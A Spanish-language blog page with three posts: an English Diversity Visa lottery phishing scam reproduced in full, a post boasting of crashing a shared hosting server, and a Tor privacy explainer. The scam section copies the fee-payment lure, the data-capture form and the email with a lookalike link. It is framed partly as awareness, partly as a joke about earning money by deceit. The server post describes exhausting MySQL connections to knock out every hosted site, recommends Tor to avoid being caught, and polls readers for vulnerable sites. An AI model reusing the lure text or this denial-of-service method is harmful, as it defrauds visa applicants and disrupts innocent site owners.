PURPOSE: The U.S. Department of State uses the fee payment primarily to process your visa related documents and verify your identity. Also you will get plane tickets for your travel. You can use the tickets at any time you want to move in the United States or just travel.

Visa Payment processing instructions

The fees must be paid using bank transfer and will be processed by the U.S. embassy in the Poland. The U.S. Department of State decided this based on the diplomatic relations with your country. Please note that you can choose the country where the interview will take place. In order to receive the payment details for paying the processing fees you need to upload your passport and the passport or National ID of your accompanying family members ( only if this is the case ). If you do not have a passport you can use your National ID or Birth Certificate.

You must email your documents at support@ceac-visa.com.

Please include your last name and your confirmation number.

Example (Identity ID or Passport for each member of your family)*

Formats File Acceptateble : JPG, PNG, PDF, GIF, TIFF, DOC, DOCX

Within 24 hours after you have uploaded the documents, you will receive a confirmation via email with the details that you need for paying the processing fees.

NOTE: Once you have received the winning notification, you have 7 working days for paying the processing fees. You are strongly encouraged not to wait until the last day to pay. Heavy demand may result in system delays. Under no circumstances can diversity visas be issued or adjustments approved after this date, nor can family members obtain diversity visas to follow-to-join the principal applicant in the U.S. after this date.

Please note that the status of your application will be updated within 24 hours after you have paid the processing fees. Do not ask us why you cannot verify your application with the confirmation number, the status of your application will change only after you have paid the processing fees.

After you have paid the processing fees, within 72 hours, you will receive a confirmation via email with the exact date and time of the final interview. Upon successful interview you will receive your documents and travel information to move in the United States.

You have been selected winner of the Diversity Visa lottery so the visa is guaranteed upon receiving the payment fees on time. A hard copy of this letter will be mailed to your postal address upon receiving the payment fees.

IMPORTANT : Do not submit your documents for processing the application if you are not able to pay the fees within 7 working days; if the processing fees are not paid in maximum 7 working days, you will be negative flagged in our database and this may cause in the future when you submit again your application; also, do not submit the documents if you don’t agree with the payment process because we cannot change our terms.

HelpFor any questions please contact U.S. Department of State’s Support at support@ceac-visa.com. Always include your last name and your Confirmation Number.

  • Este es el formulario de captación de datos de la página:
U.S. Department of State Bureau of Consular Affairs Banner

  Enter Entrant Information

1. Confirmation Number:
In the space below, type the confirmation number that was given in the winning notification.
Format: 2015xxxxxxxxxxxx.
2. Last/Family Name:
Provide the Last/Family Name that was used on the Diversity Visa Lottery Form.If no name was provided, select the option labeled ‘No Last/Family Name’ below.
A Last/Family Name was not used during the application process.
3. Year of Birth:
Provide the year of birth for the primary entrant. Format: YYYY.

 

  • Correo original :

U.S.Department of State sent you this message to Dear User (tucorreo@tuproveedormail.com)
Your registered name is included to show this message originated from U.S. Department of State

Dear Dear User,

Congratulations! You are one of the 50,000 winners selected by the computer random draw from the 12.1 million entries registered in the Diversity Immigrant Visa Program.The Diversity Immigrant Visa program is a United States congressional-mandated lottery program for receiving a United States Permanent Resident Card.It is also known as the Green Card Lottery.

Winner Details:
————————————————————————————————————————

Confirmation Number: 2015…
Winner Name: Dear User
Married: NO

————————————————————————————————————————

Please click the link below, follow the instruction and start the integration process in the United States as soon as possible.

http://state-sv66afc.ceac-notify.com/internal/status/a/?CN=2015…

CONFIDENTIALITY STATEMENT: AUTHORITIES: The information asked for on this form is requested pursuant to Section 222 of the Immigration and Nationality Act. Section 222(f) provides that the records of the Department of State and of diplomatic and consular offices of the United States pertaining to the issuance and refusal of visas or permits to enter the United States shall be considered and shall be used only for the formulation, amendment, administration, or enforcement of the immigration, nationality, and other laws of the United States. Certified copies of such records may be made available to a court provided the court certifies that the information contained in such records is needed in a case pending before the court. PURPOSE: The U.S. Department of State uses the facts you provide on this form primarily to determine your classification and eligibility for a U.S. immigrant visa. Individuals who fail to submit this form or who do not provide all the requested information may be denied a U.S. immigrant visa. Although furnishing this information is voluntary, failure to provide this information may delay or prevent the processing of your case. ROUTINE USES: If you are issued an immigrant visa and are subsequently admitted to the United States as an immigrant, the Department of Homeland Security will use the information on this form to issue you a Permanent Resident Card, and, if you so indicate, the Social Security Administration will use the information to issue a social security number. The information provided may also be released to federal agencies for law enforcement, counter terrorism and homeland security purposes; to Congress and courts within their sphere of jurisdiction; and to other federal agencies who may need the information to administer or enforce U.S. laws.

 

  • Entonces, luego de leer este artículo, también he logrado enseñarle como se hace dinero en internet, engañando personas. Pero también, y más importante aún, le enseñado a como identificar esos correos de engaño, que es lo que al final quiero que haga, y le enseñe a otros a no caer en estas tontas trampas. Los Pishers, solo necesitan una oportunidad, no se las de.

Como logré tumbar un website y el servidor del Hosting!

Como logré dar de baja, hackear, tumbar o desactivar un website y su servidor de hosting con todos los websites alojados en él.

Es algo bien sencillo para este caso, ya que en el hosting, tiene una base de datos, generalmente en MySql, al que debes acceso como usuario. Y es algo sencillo cuando tienes acceso a herramientas de programación, que manejen una base de datos relacional ya sea MS Sql Server, MySql o cualquier otra.

Pero por el momento la prueba exitosa fue con MySql 5.6 en un servidor compartido, con phpMyAdmin. Mientras mas bases de datos (DB/BD) es mas suceptible a este tipo de ataques.

Sencillo, es solo cuestión de tiempo, solo hay que abrir conexiones a la base de datos, ojo, esto no es entrarle datos, ya que para eso son desarrolladas las bases de datos relacionales, para lo que no fueron creadas es para manejar una cantidad de conexiones al mismo tiempo. Por lo que, al llegar al límite de poco menos de 6000 conexiones abiertas, AlaKassam!!!! Abra Cadabra!!! Adios Servidor con todas las páginas hospedadas en él.

Como evitar ser tu mismo quien le de baja al servidor de tu hosting, pues es muy fácil, solo debes abrir y cerrar las conexiones cada vez que ejecutes una sentencia de SQL. Las desventajas de esto, es que perderás tiempo abriendo y cerrando conexiones, y un proceso que antes tomaba solo 60 segundos, podrá tomarte hasta una hora completa, es decir 3600 segundos, por lo que es un incremento del tiempo en el proceso de un 6000%!!! Esto teniendo en cuenta la cantidad de información que se carga a la base de datos.

Aparentemente, si no tienes un servidor dedicado, puedes fácilmente cargartelo, y por otro lado, si te hacen Sql Injection, como explico en el artículo de este tema, no estarás en paz, ya que se van a divertir viendote sufrir por exceso de trabajo y estress! Tambien les recomiendo usar Tor para que no sean cuatro o cinco?

Conoces un WebSite suceptible a este método de ataque de Hackeo?

View Results

Loading ... Loading ...

TOR : Privacidad para cualquiera, donde quiera!

TOR : Privacidad para cualquiera, donde quiera!

Este es el Slogan de Tails, el sistema operativo basado en Linux Debian.

Sus virtudes :
– Usar el internet anónimamente y eludir la censura.
– No deja rastros en la computadora que esta usando,
a menos que usted sea notificado a hacerlo.
– Use lo último en herramientas criptográficas para
encriptar sus archivos, correos y mensajería instantánea.

Todo esto gracias a una aplicación llamada Tor.

Todo el tráfico de la red es enviado o manejado a traves de Tor, protegiendose contra el análisis de tráfico y la vigilancia, evitando que se sepa su localización física.

Esto se logra utilizando una serie de túneles virtuales, en vez de conectarse directamente a la red.

Tor es utilizado por todo tipo de personas, y segun sus desarrolladores, los individuos y sus familiares pueden utilizarlo para mantenerse alejados del seguimiento de las páginas visitadas.

El servicio oculto de Tor permite a los usuarios publicar web sites y otros servicios sin necesidad de revelar la localización del sitio.

Los periodistas pueden utilizarlo para salvaguardar sus  investigaciones, los activistas para mantener sus livertades civiles en línea.

Thor también puede reemplazar las tradicionales VPNs, que revelan el monto exacto y tiempo de comunicación.

Una rama de la Marina de USA lo utiliza para recolección de información. Los departamentos de Cumplimiento de la Ley lo usan para visitar o vigilar web sites sin dejar la ip del gobierno.

Como funciona Tor

Un problema básico para la privacidad es que el receptor de tus comunicaciones puede ver lo que envías mirando las cabeceras . Así puede intermediarios autorizados como los proveedores de servicios de Internet, y los intermediarios no autorizados a  también a veces. Una forma muy sencilla de análisis de tráfico podría consistir en colocarse en algún lugar entre el emisor y el receptor en la red, mirando las cabeceras. Pero también hay formas más potentes de análisis de tráfico. Algunos atacantes espían multiples partes de Internet y usan sofisticadas técnicas estadísticas para rastrear patrones de comunicación de muchas organizaciones y personas diferentes. El cifrado no ayuda mucho contra estos atacantes , ya que sólo esconde el contenido del tráfico de Internet,
no las cabeceras.

Tor ayuda a reducir los riesgos de análisis de tráfico tanto sencillo, como sofisticado, distribuyendo tus transacciones entre distintos lugares en Internet , por lo que un único punto no puede vincular a su destino. La idea es similar a usar una ruta sinuosa, de difícil  seguimiento con el fin de despistar a alguien que está siguiéndote – y luego periódicamente borrar sus huellas. En lugar de tomar una ruta directa desde el origen al destino, los paquetes de datos en la red Tor toman caminos aleatorios a través de varios repetidores que tapan tu rastro para que ningún observador de un solo punto, pueda decir de donde los datos vienen o hacia dónde van.

Para crear una ruta de red privada con Tor , el software del usuario o cliente construye incrementalmente un circuito de conexiones cifradas a través de relés de la red. El circuito se extiende un tramo cada vez y cada relé a lo largo del camino conoce únicamente qué
repetidor le proporciona los datos, y cual repetidor se los entrega. Ningun relé individual sabe nunca el recorrido completo que un paquete de datos ha tomado . El cliente negocia un conjunto separado de claves de cifrado para cada salto a lo largo del circuito para asegurar que cada tramo no puede rastrear estas conexiones a medida que pasan que van pasando.

Una vez que el circuito ha sido establecido , muchos tipos de datos se pueden intercambiar y varios tipos diferentes de aplicaciones de software pueden ser desplegados en la red Tor. Porque que cada repetidor no ve más de un tramo en el circuito, ni un espía, ni un repetidor intervenido, pueden usar análisis de tráfico para asociar el origen y destino de la conexión.

Tor sólo funciona para flujos TCP y puede ser utilizado por cualquier aplicación que soporte SOCKS.

Por eficiencia, el software de Tor utiliza el mismo circuito para las conexiones que se producen dentro de los mismos diez minutos más o menos . Peticiones posteriores se les proporciona un circuito nuevo, para evitar que alguien pueda asociar tus primeras acciones
con las nuevas.

Que hace y que no hace Tor. 
Internet sin rastros.
Para los usuarios de Windows, si lo unico que quieren es entrar al internet de forma anomina,
basta solo con usar el Browser Tor.

– Tor no proteje todo el tráfico de internet cuando lo usa, solo proteje sus aplicaciones propiamente configuradas para enviar su tráfico de internet a traves de Tor. Para evitar estos problemas, se recomienda fuertemente utilizar el browser de Tor, que ya viene preconfigurado.
– No use torrent sobre Tor, ya que es una conexion directa y a menudo envian su direccion ip real en la solicitud de seguimiento GET, porque esa es la forma en la que los torrents funcionan.
– No habilita o instala plugins del explorador de Internet. Bajo ninguna circunstancia es seguro utilizar Tor y Bitorrent al mismo tiempo.
– Tor forza a utilizar https donde quiera.
– No visualiza los documentos descargados mientras esta en linea.
– Usa puentes y/o busca companias.
Tor intenta evitar que los atacantes aprendan que sitios web que usted se conecta. Sin embargo, por defecto, no impide que alguien que observe su tráfico de Internet para aprender que está utilizando Tor. Si esto es importante para usted, puede reducir este riesgo mediante la configuración de Tor para usar un transmisor de puente Tor, en lugar de conectarse directamente a la red pública
de Tor . Ultimamente la mejor protección es un enfoque social : mientras más usuarios de Tor allí están cerca de usted y más diversos sus intereses, menos peligroso será que usted sea uno
de ellos. Convenza a otras personas de usar Tor!

Como Configurar el Servicio Oculto Tor, Configurar el Relay Tor y su Manual, estan disponibles en su página. Así como su código fuente.

Tor esta disponible para Android en la Google PlayStore.
Otras plataformas para las que esta disponible puedes
encontrarle en el link de descargas Tor.

La otra cara de la moneda, es pues, que personas con intenciones poco amorosas pueden usarlo para comunicar sus planes a otros con el mismo pensamiento, lo que puede generar un mal que no pueda ser controlado, y llevarnos a una histeria generalizada contra un grupo, etnia o religión.  Pero como todo, tanto puede ser utilizado para el bien, como para acciones poco educativas.

Crees que necesitas Tor, o es solo para espias y agentes de seguridad?

View Results

Loading ... Loading ...